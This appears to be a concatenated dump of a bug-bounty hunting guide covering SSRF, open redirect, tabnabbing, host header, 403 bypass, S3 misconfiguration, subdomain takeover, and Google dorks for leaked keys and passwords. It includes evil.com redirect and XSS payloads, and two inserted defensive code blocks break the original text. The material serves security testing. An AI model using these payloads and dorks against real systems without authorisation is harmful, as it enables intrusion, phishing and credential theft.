2. There are lots of images there with various resolutions (e.g. 1280 * 720) and various sizes in MB.
3. Go to the Upload option on the website
4. Upload the image
5. See the path of the uploaded image (either right click on the image and copy the image address, or right click and inspect the image; the URL will appear in the inspector, edit it as HTML)
6. Open it in http://exif.regex.info/exif.cgi
7. See whether it is still showing EXIF data; if it is, report it.

# Reports (Hackerone)

- [IDOR with Geolocation data not stripped from images](https://hackerone.com/reports/906907)

# Author
* [@0xd3vil](https://twitter.com/0xd3vil)
* [@klaus](https://twitter.com/klaus_dev)
-------------------------------------------------------------------------------- /SSRF/Blind_SSRF.md: --------------------------------------------------------------------------------
# Blind SSRF
Blind SSRFs are those that don't show the enumerated data directly to the user, and hence are known as blind SSRF.

## Different Methods:

### Methodology #1:
**Header** **Injection**:

One way of finding them is by inserting your Burp Collaborator domain into the Referer header, also known as host header injection.

Snippet:
```
GET / HTTP/1.1
Host: site.tld
User-Agent: Firefox
Referer: https://your_collaborator_instance.com

```


Many organizations use services that analyse which URL or service is referring the visitor to their site. Execution of this type of attack depends upon the underlying service. In my case the server was running on an AWS EC2 instance, but I was unable to get to its admin panel, namely (192.168.192.168), as it was only performing a lookup on me but not allowing anything beyond that. Try it on different sites and services that you come across; you just might get lucky.

I will list more as I find them. If you have found any, please kindly list them here so that others benefit from it.
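Three of the write-ups on this page (the open-redirect bypass with `www.targetweb.com.attackersite.com`, the CORS Origin list, and this blind SSRF via the Referer header) are all failures to validate a URL or host a client supplied. The following is an added example, not code from the HowToHunt repository, of the server-side checks that close all three: a label-aligned host allowlist for redirect targets, an exact-origin check for `Access-Control-Allow-Origin`, and an egress check that resolves a URL's host and refuses internal addresses before the server fetches it. The domains, IPs and the fake resolver are constructed assumptions; a real deployment would resolve with `socket.getaddrinfo` and connect to the IP it checked.

```python
"""Added example, not code from the HowToHunt repository: the server-side URL
and host checks that close three flaws collected on this page.

  * Open redirect: `www.targetweb.com.attackersite.com` passes a loose regex /
    prefix match.  Parse the URL and compare the host to an allowlist with a
    dot-anchored suffix instead.
  * CORS: decide whether a request Origin may be echoed into
    Access-Control-Allow-Origin by exact host match, so `null`,
    `attackertarget.com`, `attacker.com/target.com` and an attacker-held
    sub-domain are all refused.
  * Blind SSRF: before the server fetches a client-supplied URL (such as a
    Referer value), resolve the host and refuse loopback, private, link-local
    and unspecified addresses.

Domains, IPs and the fake resolver are constructed for the example.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def host_allowed(host, allowlist, subdomains=True):
    """True if `host` is on the allowlist, or (when `subdomains`) a label-aligned
    sub-domain of an entry: `a.target.com` matches `target.com`,
    `attackertarget.com` and `target.com.evil.com` do not."""
    if not host:
        return False
    host = host.lower().rstrip(".")
    for allowed in (a.lower() for a in allowlist):
        if host == allowed or (subdomains and host.endswith("." + allowed)):
            return True
    return False


def safe_redirect_target(url, allowlist, default="/"):
    """Return `url` if it is a same-site path or points at an allowlisted host,
    otherwise the safe default.  Parsing, not a regex, decides the host."""
    parts = urlsplit(url)
    if (not parts.scheme and not parts.netloc and url.startswith("/")
            and not url.startswith(("//", "/\\"))):
        return url                        # relative path: stays on this site
    if parts.scheme not in ALLOWED_SCHEMES:
        return default                    # '//evil', 'javascript:', bare hosts
    return url if host_allowed(parts.hostname, allowlist) else default


def cors_allow_origin(origin_header, allowlist):
    """Value for Access-Control-Allow-Origin, or None to send no header.
    Exact host match: a wildcard on sub-domains would extend trust to any
    sub-domain an attacker controls (see the Subdomain_Takeover folder)."""
    if not origin_header or origin_header == "null":
        return None
    parts = urlsplit(origin_header)
    if parts.scheme != "https" or parts.path or parts.query or parts.fragment:
        return None                       # not a bare origin
    if not host_allowed(parts.hostname, allowlist, subdomains=False):
        return None
    return f"{parts.scheme}://{parts.netloc}"


def is_public_address(ip):
    """Reject anything that could reach the host's own network or metadata.
    Note that Python also classes the RFC 5737 documentation ranges as private."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def safe_egress_url(url, resolve):
    """Validate a client-supplied URL before the server fetches it.  `resolve`
    maps a hostname to its IP strings; every answer must be public, which also
    catches a name that resolves to one public and one internal address."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        ips = resolve(parts.hostname)
    except OSError:
        return False
    return bool(ips) and all(is_public_address(ip) for ip in ips)


# Constructed DNS answers standing in for a real resolver.
FAKE_DNS = {
    "collaborator.example.net": ["93.184.216.34"],
    "intranet.corp.example": ["10.0.0.5"],
    "rebind.example.net": ["93.184.216.34", "127.0.0.1"],
}


def fake_resolve(host):
    try:
        ipaddress.ip_address(host)        # an IP literal resolves to itself
        return [host]
    except ValueError:
        pass
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    raise OSError("NXDOMAIN")
```

The egress check is only as good as the connection that follows it: if the server validates the name and then lets an HTTP library resolve it again, a DNS answer that changes between the two lookups slips through, so connect to the IP that was checked. On the detection side, a web server that fetches whatever appears in `Referer` should log those outbound requests; a burst of lookups to a single unfamiliar domain is the signal the write-up's Collaborator probe produces.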
24 | 25 | ### Contributor: 26 | * [@cowlingbanana](https://github.com/cowlingbanana) 27 | 28 | -------------------------------------------------------------------------------- /Status_Code_Bypass/README.md: -------------------------------------------------------------------------------- 1 | # Some Mind Maps 2 | -------- 3 | ### 403 Mindmap 4 | ![https://pbs.twimg.com/media/EWmW9-tWkAA4vLs?format=jpg&name=900x900](https://pbs.twimg.com/media/EWmW9-tWkAA4vLs?format=jpg&name=900x900) 5 | 6 | ### Source 7 | * [https://twitter.com/hackerscrolls/status/1254701239360720900](https://twitter.com/hackerscrolls/status/1254701239360720900) 8 | --- 9 | ### Few Twitter Tips 10 | ![https://pbs.twimg.com/media/EheFZJvVgAEuzZ1?format=png&name=small](https://pbs.twimg.com/media/EheFZJvVgAEuzZ1?format=png&name=small) 11 | * [https://twitter.com/iam_j0ker/status/1303658167205728256](https://twitter.com/iam_j0ker/status/1303658167205728256) 12 | --- 13 | ### Few More Twitter Tips 14 | ![https://pbs.twimg.com/media/EkezB9QW0AAKa-Y?format=jpg&name=medium](https://pbs.twimg.com/media/EkezB9QW0AAKa-Y?format=jpg&name=medium) 15 | ![https://pbs.twimg.com/media/EkezB9VXUAYttBU?format=jpg&name=large](https://pbs.twimg.com/media/EkezB9VXUAYttBU?format=jpg&name=large) 16 | ![https://pbs.twimg.com/media/EkezB9LX0AA8DET?format=jpg&name=large](https://pbs.twimg.com/media/EkezB9LX0AA8DET?format=jpg&name=large) 17 | * [https://twitter.com/h4x0r_dz/status/1317218511937261570](https://twitter.com/h4x0r_dz/status/1317218511937261570) 18 | --- 19 | ### Author 20 | * [KathanP19](https://twitter.com/KathanP19) 21 | -------------------------------------------------------------------------------- /API_Testing/Reverse_Engineer_an_API.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineer an API 2 | 3 | 4 | ## Tools to use 5 | 1. FoxyProxy 6 | 2. mitmweb 7 | 3. mitmproxy2swagger 8 | 4. https://editor.swagger.io/ 9 | 5. 
Postman

## Steps to Reproduce
1. **FoxyProxy:** Turn on port 8080 using FoxyProxy (label it anything you want).
2. **mitmweb:** Run `sudo mitmweb`, then go to mitm.it and install & import the certificate.
3. **Explore the website's API functionality:** Go to the website whose API endpoints you want to gather and explore its functionality.
mitmweb will capture the traffic; afterwards you can download the captures as a flow file in mitmweb by clicking File -> Save all.
4. **mitmproxy2swagger:** Run `sudo mitmproxy2swagger -i flows -o spec.yml -p -f flow`. This turns the flows file into a YAML file. Afterwards remove the `ignore:` prefixes in spec.yml and run
`sudo mitmproxy2swagger -i flows -o spec.yml -p -f flow --examples`; `--examples` is added to enrich the documentation of the API endpoints.
5. **https://editor.swagger.io/:** Now you can import the clean spec.yml file and visualize the different endpoints.
6. **Postman:** You can also import spec.yml into Postman, which produces a well-organized collection.

--------------------------------------------------------------------------------
/Rate_limit/No Rate-limit on Invite User.md:
--------------------------------------------------------------------------------

## Flaw-Name : No rate limit on invite user leads to email triggering
---

### Description :
- Rate limiting is a strategy for limiting network traffic. It puts a cap on how often someone can repeat an action within a certain timeframe – for instance, trying to log in to an account.
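The description above says what rate limiting does; as an added example (not from the original repository or its author), here is the shape of a limiter that closes the invite flood this note describes. It counts events in a sliding window per inviter account, per client IP and per recipient address, and rejects the request before any mail is handed to the provider. The limit values, the `InviteService` name and the fake clock are constructed for the illustration; real products pick numbers that fit their traffic.

```python
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """At most `limit` events per `window_seconds` for each key.

    Timestamps are kept in a deque per key and expired ones are pruned on
    every call. `clock` is injectable so the behaviour can be tested without
    waiting for real time to pass.
    """

    def __init__(self, limit, window_seconds, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self._events = defaultdict(deque)

    def _prune(self, key, now):
        q = self._events[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        return q

    def has_capacity(self, key):
        """Check without consuming, so a request rejected by a later bucket
        does not silently burn capacity in an earlier one."""
        return len(self._prune(key, self.clock())) < self.limit

    def record(self, key):
        now = self.clock()
        self._prune(key, now).append(now)


class InviteService:
    """Invite endpoint with three independent limits (values constructed for
    this example): 20 invites/hour per inviter account, 50/hour per client IP,
    and 3/day per recipient address. The recipient bucket is what stops one
    victim being mail-bombed from many accounts or IPs."""

    def __init__(self, clock=time.monotonic):
        self.limits = {
            "account": SlidingWindowLimiter(20, 3600, clock),
            "ip": SlidingWindowLimiter(50, 3600, clock),
            "recipient": SlidingWindowLimiter(3, 86400, clock),
        }
        self.outbox = []  # stands in for the paid mail-provider API call

    def invite(self, account_id, client_ip, email):
        email = email.strip().lower()  # one bucket per mailbox, not per spelling
        keys = {"account": account_id, "ip": client_ip, "recipient": email}
        for name, limiter in self.limits.items():
            if not limiter.has_capacity(keys[name]):
                return False, f"rate_limited:{name}"  # surface as HTTP 429
        for name, limiter in self.limits.items():
            limiter.record(keys[name])
        self.outbox.append(email)
        return True, "sent"


class FakeClock:
    """Controllable clock for the simulation below."""

    def __init__(self, start=1_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def simulate_intruder_burst(attempts=100):
    """Replay the Intruder attack from the steps: one attacker account, one IP,
    the same victim address `attempts` times. Returns (sent, rejected)."""
    clock = FakeClock()
    svc = InviteService(clock)
    sent = rejected = 0
    for _ in range(attempts):
        ok, _reason = svc.invite("attacker-acct", "203.0.113.7", "Victim@Example.com")
        sent += ok
        rejected += not ok
    return sent, rejected


if __name__ == "__main__":
    print("sent=%d rejected=%d" % simulate_intruder_burst())
```

Checking every bucket before recording in any of them is deliberate: if the recipient bucket rejects the request, the inviter's own hourly allowance is left intact, and the same 429 response is returned whichever bucket fired, so the response does not reveal which limit was hit.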

---
### Steps To Reproduce
1. Go to `https://target.com/`
2. Navigate to the `Invite User` option and enter the `victim's email`
3. Send the invite & `Intercept` the request
4. Send the request to `Intruder` & clear payload positions
5. Set the payload type to `null payload` and the payload count to 100
6. Click `Start attack` after setting the threads
7. The victim will get a huge number of emails
---
### Impact :
- If the company is using an email service API (such as AWS, GCP, etc.) or a paid tool for the emails sent from the support domain, the missing rate limit can result in `financial loss` and can also `slow down your services`, as huge/mass mails will `lead to disruption` of the mail legitimate users might send, or the purchased quota might be exhausted.
---
### Mitigation -

1. IP-based blocking
2. Captcha
3. Firewall
4. Reducing the number of API requests

--------------------------------------------------------------------------------
/Weak_Password_Policy/Weak_password_policy.md:
--------------------------------------------------------------------------------


Summary:

A weak password policy increases the probability of an attacker succeeding with brute-force and dictionary attacks against user accounts. An attacker who can determine user passwords can take over a user's account and potentially access sensitive data in the application.

There are two ways in which this can be checked.

### First Way

- Check if you can use a password that is the same as the email address
- Check if you can use a username that is the same as the email address
- Try the above when resetting a password, creating an account, and changing the password from account settings

### Second Way

- Check if you can use weak passwords such as 123456, 111111, abcabc, qwerty123
- Try the above when resetting a password, creating an account, and changing the password from account settings

* Applications usually have restrictions on passwords while creating an account; make sure you check both cases when resetting a password

### References

- [All About Weak Password Policy](http://applicationsecurity.io/appsec-findings-database/weak-password-policy/)
- [OWASP Guide for Weak Passwords](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy)

--------------------------------------------------------------------------------
/BrokenLinkHijacking/BrokenLinkHijacking.md:
--------------------------------------------------------------------------------

## Steps

1. Manually find and click external links on the target site (for example, links to social media accounts or external media links).
2. While doing the manual work, also run [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) in the background using the command below in a terminal.

`blc -rof --filter-level 3 https://example.com/`

The output will look something like:

`─BROKEN─ https://www.linkedin.com/company/ACME-inc-/ (HTTP_999)`

3. Now check whether the company still owns that page; if not, register it as the company or try to obtain that username or URL.

## Alternate Step
1. Go to [Online Broken Link Checker](https://ahrefs.com/broken-link-checker), [Dead Link Checker](https://www.deadlinkchecker.com/) or [Alternative Online Broken Link Checker](https://brokenlinkcheck.com/)
2. Input the domain name

## Reference

* [https://edoverflow.com/2017/broken-link-hijacking/](https://edoverflow.com/2017/broken-link-hijacking/)
* [https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d)

### Author:
* [@KathanP19](https://twitter.com/KathanP19)
* [@cyph3r_asr](https://twitter.com/cyph3r_asr)
* [@v3daxt](https://twitter.com/v3daxt)

--------------------------------------------------------------------------------
/Misconfigurations/Default_Credential_And_Admin_Panel.md:
--------------------------------------------------------------------------------

## Default Credentials Basics

- Default software configurations for the admin console of a web app
```
https://www.target.com/admin
https://www.target.com/admin-console
https://www.target.com/console
https://admin.target.com
https://admin-console.target.com
https://console.target.com
```

## 1. Getting access through third party services

* When the admin console login page is hosted on a third-party service, just search Google for its default credentials
* Third-party service URLs are of the format: https://target..com/login
* Some examples are Okta, WP, etc.

## 2. Bypass to get access to login page
```
1.
This bypass is used when you are forbidden from accessing the admin login page
2. We use header injection for this bypass
3. `X-Original-URL: /admin` or `X-Rewrite-URL: /admin`
4. Add this header under Host

* Use Burp to capture the request, then check
```
## Hackerone Reports :
- https://hackerone.com/reports/192074
- https://hackerone.com/reports/174883
- https://hackerone.com/reports/398797

## Reference :
https://www.owasp.org/index.php/Testing_for_default_credentials_(OTG-AUTHN-002)
https://www.owasp.org/index.php/Testing_for_Default_or_Guessable_User_Account_(OWASP-AT-003)

## Author:
* [@e11i0t_4lders0n](https://twitter.com/e11i0t_4lders0n)

--------------------------------------------------------------------------------
/Sensitive_Info_Leaks/Github_Recon_Method.md:
--------------------------------------------------------------------------------

# Github Recon
Using GitHub we can find sensitive information.

## Steps:

1. Search GitHub for the company name together with API keys or passwords.
2. Enumerate the employees of the company from LinkedIn and Twitter and check their GitHub repositories for sensitive information.
3. Check the source code of the main website and subdomains for GitHub links in the HTML comments or anywhere else.
Search using Ctrl-F for the keyword "github".

## Tools and references:
* https://github.com/BishopFox/GitGot
* https://github.com/hisxo/gitGraber
* https://github.com/tillson/git-hound
* https://securitytrails.com/blog/github-dorks

## Reports (Hackerone)

### Resolved

- [Important information leaked on Github](https://hackerone.com/reports/649322)
- [Github Token Leaked publicly for https://github.com/mopub](https://hackerone.com/reports/612231)
- [CircleCI token in github repo allows for access to sensitive build information](https://hackerone.com/reports/858915)
- [Information Leak - Github - JMS Information](https://hackerone.com/reports/360811)
- [Leaked artifactory_key, artifactory_api_key, and gcloud refresh_token via GitHub.](https://hackerone.com/reports/496414)
- [Github Token Leaked publicly for https://github.sc-corp.net](https://hackerone.com/reports/396467)

## Author:
* [@0xCCFFF](https://twitter.com/0xCCFFF) (MadMaxx)
* [@klaus](https://twitter.com/klaus_dev)

--------------------------------------------------------------------------------
/Tabnabbing/Tabnabbing.md:
--------------------------------------------------------------------------------

# Tabnabbing

Even though this vulnerability is rated by many bug bounty programs as a low-severity bug, it is worth looking for, as it is very easy to find.

### More information about the vulnerability:

When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, he checks that the link's `rel` attribute does not contain the value `noopener` and the `target` attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing.

### How to exploit:
```
1.
Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com"
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
4. If the victim opens the background tab again and doesn't look at the address bar, he may think he has been logged out, because a login page appears, for example.
5. The victim tries to log on again and the attacker receives the credentials.
```

### How to search for it:

As already mentioned, you have to search for the following link formats:

```html

or

```

### Author

* [@bolli95](https://github.com/bolli95)

--------------------------------------------------------------------------------
/Misconfigurations/S3-Bucket_Misconfig.md:
--------------------------------------------------------------------------------

## How to check for Amazon S3 bucket misconfiguration
* First of all, you need to install the AWS CLI: `pip install awscli`
* Don't forget to set:
  - Access key
  - Secret key

**1. Check if you can list items from the bucket.**
`aws s3 ls s3://`
* See if you are able to access that bucket.
* If the bucket is not accessible, we can still try to exploit it.

* If you are getting errors, run this command:
`aws s3 ls s3:// --no-sign-request`

**2. Try moving or deleting files and see whether you are able to do that.**
* If it is possible to move files, it is vulnerable and you can report it; otherwise it is not vulnerable.
* First make a file:
`echo "Testing purpose" >> test.txt`
* Now try to move the file into the bucket:
`aws s3 mv test.txt s3://`
* Also try copying the file from the local drive to the S3 bucket:
`aws s3 cp test.txt s3://[bucketname]/test.txt`

**3.
Delete files from the bucket.**
* Command to delete the file from the bucket:
`aws s3 rm s3://[bucketname]/test.txt` *(if it is present)*

## References :
* [Hackerone Report](https://hackerone.com/reports/700051)
* [Hackerone Report](https://hackerone.com/reports/229690)
* [https://bugbountypoc.com/s3-bucket-misconfiguration-from-basics-to-pawn](https://bugbountypoc.com/s3-bucket-misconfiguration-from-basics-to-pawn)

## Author :
* [Anishka Shukla](https://twitter.com/AnishkaShukla)
* [Anubhav Singh](https://twitter.com/AnubhavSingh_)

--------------------------------------------------------------------------------
/Host-Header/Host-Header.md:
--------------------------------------------------------------------------------

# Summary For Host Header
![https://pbs.twimg.com/media/ET39wJOWoAAfTBb?format=jpg&name=small](https://pbs.twimg.com/media/ET39wJOWoAAfTBb?format=jpg&name=small)

# Also Check These Things While Testing
1. Add two `Host:` headers to the request.
2. Try these headers:
```
X-Original-Url:
X-Forwarded-Server:
X-Host:
X-Forwarded-Host:
X-Rewrite-Url:
```
3. If you come across `/api.json` in any AEM instance during bug hunting, try web cache poisoning via
`Host: , X-Forwarded-Server , X-Forwarded-Host:`
and/or simply try `https://localhost/api.json HTTP/1.1`
4. Also try `Host: redacted.com.evil.com`
5. Try `Host: evil.com/redacted.com`
[https://hackerone.com/reports/317476](https://hackerone.com/reports/317476)
6. Try this too: `Host: example.com?.mavenlink.com`
7. Try `Host: javascript:alert(1);`; the XSS payload might show up in debugging mode.
[https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html](https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
8.
Host header to SQLi
[https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610](https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610)
9. Bypass front-server restrictions and access forbidden files and directories through `X-Rewrite-Url` / `X-Original-Url:`
`curl -i -s -k -X 'GET' -H 'Host: ' -H 'X-rewrite-url: admin/login' 'https:///'`

## Author:
* [@KathanP19](https://twitter.com/KathanP19)

--------------------------------------------------------------------------------
/XXE/Billion_Laugh_Attack.md:
--------------------------------------------------------------------------------

# Billion Laugh Attack
- Another common vulnerability associated with XML parsing is called a Billion Laughs attack. It uses entities that expand into many copies of other entities, so resolving them consumes a large amount of CPU and memory and causes a denial of service. An example XML payload that can trigger it is as follows:

```
Step 1 : Capture the request into Burp
Step 2 : Send it to the Repeater tab and then convert the body into XML, whether it is accepted or not
Step 3 : To confirm, check the [ Accept ] header and change it to application/json
Step 4 : Convert JSON into XML if there is no other possibility
Step 5 : Add the payload in between and change the content lol1 to lol9 depending on the DoS variation in the XML field!
```

- Billion Laugh Payload :
```
]>
&lol9;
```

## Contributor:
- [N3T_hunt3r](https://twitter.com/N3T_hunt3r)

--------------------------------------------------------------------------------
/API_Testing/Hidden_API_Functionality_Exposure.md:
--------------------------------------------------------------------------------

# Hidden API Functionality Exposure
- Application programming interfaces (APIs) have become a critical part of almost every business. APIs are responsible for transferring information between systems within a company or to external companies. For example, when you log in to a website like Google or Facebook, an API processes your login credentials to verify they are correct.

1. Swagger UI Documentation
2. Dictionary Attack | Brute force
3. Common wordlists for API enumeration:
   - https://wordlists.assetnote.io/
   - https://github.com/Net-hunter121/API-Wordlist

## Steps to Perform This Attack :
```
Step 1 : Capture the request in Burp, then send it to the Repeater and Intruder tabs.
Step 2 : Mark the endpoint in the Intruder tab and add the payload from the wordlist.
Step 3 : First use a dictionary attack with SecLists (https://github.com/danielmiessler/SecLists) on the endpoint.
Step 4 : Either use your own customized list or the ones provided in the step above.
Step 5 : Then simply start the attack and check for 200 statuses.
Step 7 : Once there is an HTTP 200 OK status, start a recursive scan on the same endpoint for juicy information like Swagger docs and so on.
Step 8 : Another method is to change the API version and try brute-forcing the same endpoint
Eg: Redacted.com/api/v1/{Endpoint} ----- Redacted.com/api/v2/{Endpoint}
```
* Note: There will be minimum limits per request assigned without API keys, so make sure to use the manual approach as much as you can; the rest can be automated for scanning API vulnerabilities with automated tools.

## Contributor:
- [N3T_hunt3r](https://twitter.com/N3T_hunt3r)

--------------------------------------------------------------------------------
/Sensitive_Info_Leaks/Google_Dorks.md:
--------------------------------------------------------------------------------

### Google Dorks to find Juicy Content

- `inurl:example.com intitle:"index of"`
- `inurl:example.com intitle:"index of /" "*key.pem"`
- `inurl:example.com ext:log`
- `inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv`
- `inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git`
- `inurl:example.com intitle:"index of" "config.db"`
- `inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml`
- `inurl:example.com intext:admin ext:sql inurl:admin`
- `inurl:example.com allintext:username,password filetype:log`
- `site:example.com "-----BEGIN RSA PRIVATE KEY-----" inurl:id_rsa`
- `site:*.gov.* "responsible disclosure"`

![t](https://miro.medium.com/max/550/1*N9W6DfGA6wxgKTiywV9aUA.png)

[Reference](https://blog.usejournal.com/how-recon-helped-samsung-protect-their-production-repositories-of-samsungtv-ecommerce-estores-4c51d6ec4fdd)

#### Other than Google, try these dorks on various search engines such as DuckDuckGo, Bing, etc.

## Reports (Hackerone)

### Resolved

- [Securing "Reset password" pages from bots](https://hackerone.com/reports/43807)
- [Private Grab Messages on Android App can be accessed and cached by Search Engines](https://hackerone.com/reports/221558)

### Informative

- [Information disclosure through search engines (password reset token)](https://hackerone.com/reports/322988)

### N/A

- [Research papers on yelp are getting indexed by google bots.](https://hackerone.com/reports/207435)

Author
- [Keshav Malik](twitter.com/g0t_rOoT_)
- [Naveen Prakaasham](twitter.com/NPrakaasham)
- [@klaus](https://twitter.com/klaus_dev)
- [Fani Malik](https://twitter.com/fanimalikhack)

--------------------------------------------------------------------------------
/Status_Code_Bypass/403Bypass.md:
--------------------------------------------------------------------------------

## 403 Bypass
I am sharing all these tips and techniques from my own personal experience; there are no official references for them.

### Directory Based
If you see a directory with no slash at the end, try these there:
```
site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200
```
### File Based
If you see a file without any slash at the end, try these there:
```
site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200
```
### Protocol Based
Well, it sounds weird, but check out the example for a better understanding:
```
https://site.com/secret => 403
http://site.com/secret => 200
```
## Payloads
```
/
/*
/%2f/
/./
./.
/*/
```
### Header
[https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/](https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/)
```
X-Forwarded-For: 127.0.0.1
```

### Tools
Here are tools I found on Twitter.
* [https://github.com/yunemse48/403bypasser](https://github.com/yunemse48/403bypasser)
* [https://github.com/Dheerajmadhukar/4-ZERO-3](https://github.com/Dheerajmadhukar/4-ZERO-3)

## Proof Of Concept
Always look for references or a proof of concept when someone shares a tip, so you can confirm you are not wasting your time.
I have some PoC videos on my YouTube channel for 403 and other improper access control bugs found with those methods.
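The directory-based and file-based bypasses above work because the component returning the 403 compares the raw request path while the backend that serves the 200 normalizes it first. As an added example (not from the original note or its authors), the following contrasts that naive check with an authorization check that canonicalizes the path the way the backend will before matching. The rule table, the function names (`canonicalize`, `naive_is_protected`, `hardened_is_protected`, `compare`) and the sample paths are constructed for this illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed rule table: canonical paths that require an authenticated admin.
PROTECTED = ("/secret", "/secret.txt")


def naive_is_protected(raw_path):
    """The check the bypasses in this note defeat: a literal comparison of the
    raw request path, so '/secret/./' or '/%2f/secret.txt/' slip through even
    though the backend serves the same resource for them."""
    return raw_path in PROTECTED


def canonicalize(raw_path):
    """Reduce a request path to the form the backend will resolve it to.
    Returns None when the path is too ambiguous to judge (the caller denies).
    """
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    decoded = unquote(path)
    if unquote(decoded) != decoded:
        return None  # double-encoded: don't guess how many times the backend decodes
    if "\x00" in decoded or "\\" in decoded:
        return None  # NUL bytes or backslash separators: deny rather than interpret
    if not decoded.startswith("/"):
        decoded = "/" + decoded
    collapsed = re.sub(r"/+", "/", decoded)  # '///secret.txt/' -> '/secret.txt/'
    return posixpath.normpath(collapsed)     # resolves '.' and '..', drops trailing '/'


def hardened_is_protected(raw_path):
    """Match on the canonical path with directory semantics: the rule for
    '/secret' also covers '/secret/*'. Unparseable paths are denied."""
    canon = canonicalize(raw_path)
    if canon is None:
        return True
    return any(canon == rule or canon.startswith(rule + "/") for rule in PROTECTED)


def compare(paths):
    """For each path, (naive verdict, hardened verdict); True means 403."""
    return {p: (naive_is_protected(p), hardened_is_protected(p)) for p in paths}


if __name__ == "__main__":
    # The request paths from the Directory Based and File Based sections above.
    sample = ["/secret", "/secret/*", "/secret/./", "/secret.txt", "/secret.txt/",
              "/%2f/secret.txt/", "/public/index.html"]
    for path, (naive, hard) in compare(sample).items():
        print(f"{path:20} naive={'403' if naive else '200'}  hardened={'403' if hard else '200'}")
```

The same canonical check has to run on every listener; the protocol-based bypass in this note is the case where the rule exists on the HTTPS virtual host but was never applied to the plain-HTTP one.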
You can check them out.

YouTube: [Mehedi Hasan Remon](https://www.youtube.com/channel/UCF_yxU7acxUojiGiOAMafQQ/videos?view_as=subscriber)

Author: [@remonsec](https://twitter.com/remonsec)
[@KathanP19](https://twitter.com/KathanP19)

--------------------------------------------------------------------------------
/Open_Redirection/find_OpenRedirect_trick.md:
--------------------------------------------------------------------------------

## A small trick to find Open Redirection if you couldn't find any redirection parameters.

*"I apply this every time while testing web applications and have found many Open Redirects and even an XSS using this trick!"*

### Steps:
---
1. If the application has a user Sign-In/Sign-Up feature, register a user and log in as that user.

2. Go to your user profile page, for example: samplesite.me/accounts/profile

3. Copy the profile page's URL

4. Log out, clear all the cookies and go to the homepage of the site.

5. Paste the copied profile URL into the address bar

6. If the site prompts for a login, check the address bar; you may find the login page with a redirect parameter like the following
   - https://samplesite.me/login?next=accounts/profile
   - https://samplesite.me/login?retUrl=accounts/profile

7. Try to exploit the parameter by adding an external domain and load the crafted URL
   eg:- https://samplesite.me/login?next=https://evil.com/
   (or)
   https://samplesite.me/login?next=https://samplesite.me@evil.com/ #(to beat the bad regex filter)

8. If it redirects to evil.com, there's your open redirection bug.

9.
Try to leverage it to XSS
   eg:- https://samplesite.me/login?next=javascript:alert(1);//

---

#### Author: [febinrev](https://twitter.com/febinrev)

--------------------------------------------------------------------------------
/Subdomain_Takeover/Easy_Methods.md:
--------------------------------------------------------------------------------

# 1. Method by [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
Easy Subdomain Takeover Method
```
Steps:

1: Grab all subdomains of the target, i.e. subfinder -d flaws.cloud | tee -a domains.txt

2: Run this one-liner:

3: cat domains.txt | while read domain; do dig $domain; done | tee -a digs.txt

4: Grab all the CNAME entries, i.e. cat digs.txt | grep CNAME

5: Find a domain that points to a third-party domain, like sub.example.com CNAME x.aws.com

6: Check whether the main subdomain is down

7: Go to the hosting provider the domain points to and register that domain; if you registered it, congrats, you have taken over the subdomain.

```

# 2. Method by [@WhoIs1nVok3r](https://twitter.com/WhoIs1nVok3r)
```
Step-1:- First of all, collect all subdomains of the target using assetfinder, subfinder, chaos (needs API key).

Step-2:- Next, sort out duplicate URLs using -- cat unresolved | sort -u | tee -a resolved

Step-3:- Pass it to subzy, subjack or another subdomain-takeover tool -- using subzy: subzy -targets resolved, or use subjack

Step-4:- We can also use nuclei templates, but we need to run httpx first -- cat resolved | httpx | tee -a hosts

Step-5:- Next use nuclei-templates -- cat hosts | nuclei -t nuclei-templates/vulnerabilities -o nuclei.txt -v

Tools Used:-

https://github.com/projectdiscovery/nuclei
https://github.com/projectdiscovery/subfinder
https://github.com/projectdiscovery/httpx
https://github.com/projectdiscovery/nuclei-templates
https://github.com/projectdiscovery/chaos-client
https://github.com/haccer/subjack
https://github.com/LukaSikic/subzy
```

## Author
* [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
* [@WhoIs1nVok3r](https://twitter.com/WhoIs1nVok3r)

--------------------------------------------------------------------------------
